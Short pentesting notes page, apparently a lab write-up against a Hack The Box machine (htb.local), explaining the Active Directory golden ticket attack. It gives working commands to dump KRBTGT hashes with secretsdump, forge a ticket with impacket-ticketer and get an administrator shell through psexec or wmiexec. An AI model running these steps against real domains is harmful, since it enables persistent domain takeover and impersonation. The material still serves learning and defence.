Golden ticket

The Goldent ticket attacks is a persistence attack allowing an attacker to impersonate any user on the domain via the creation of a TGT. In fact, once the rogue TGT is created, the attacker can access any services on the domain as the user the TGT was create for!

Elements needed:

  1. KRBTGT hash

  2. SID of the domain

  3. Username to impersonate

  4. The domain FQDN

STEPS - Remotely with Impacket

1.KRBTGT hash

This information is the hardest part to obtain as we often need to be domain admin to be able to dump the KRBTGT hashes. For example, we can use mimikatz or the impacket-secretsdump script.

impacket-secretsdump htb.local/amandine:AAAaaa111@10.10.10.161

2. Get the domain SID

With the PowerView module loaded on the target system run:

Get-ADDomain

3. Use impacket-ticketer to create the ticket remotely

root@kali# impacket-ticketer -nthash 819af826bb148e603acb0f33d17632f8 -domain-sid S-1-5-21-3072663084-364016917-1341370565 -domain htb.local administrator

4. Export the Golden ticket to my environment variable. 

root@kali# export KRB5CCNAME=administrator.ccache

5. Login as administrator using psexec or wmiexec

Adding to the /etc/hosts file the hostname of the target system and the domain can avoid a lot of bugs. 

root@kali# impacket-psexec htb.local/administrator@forest -k -no-pass
OR
root@kali# impacket-wmiexec htb.local/administrator@forest -k -no-pass

PreviousBloodhoundNextAD CS

Last updated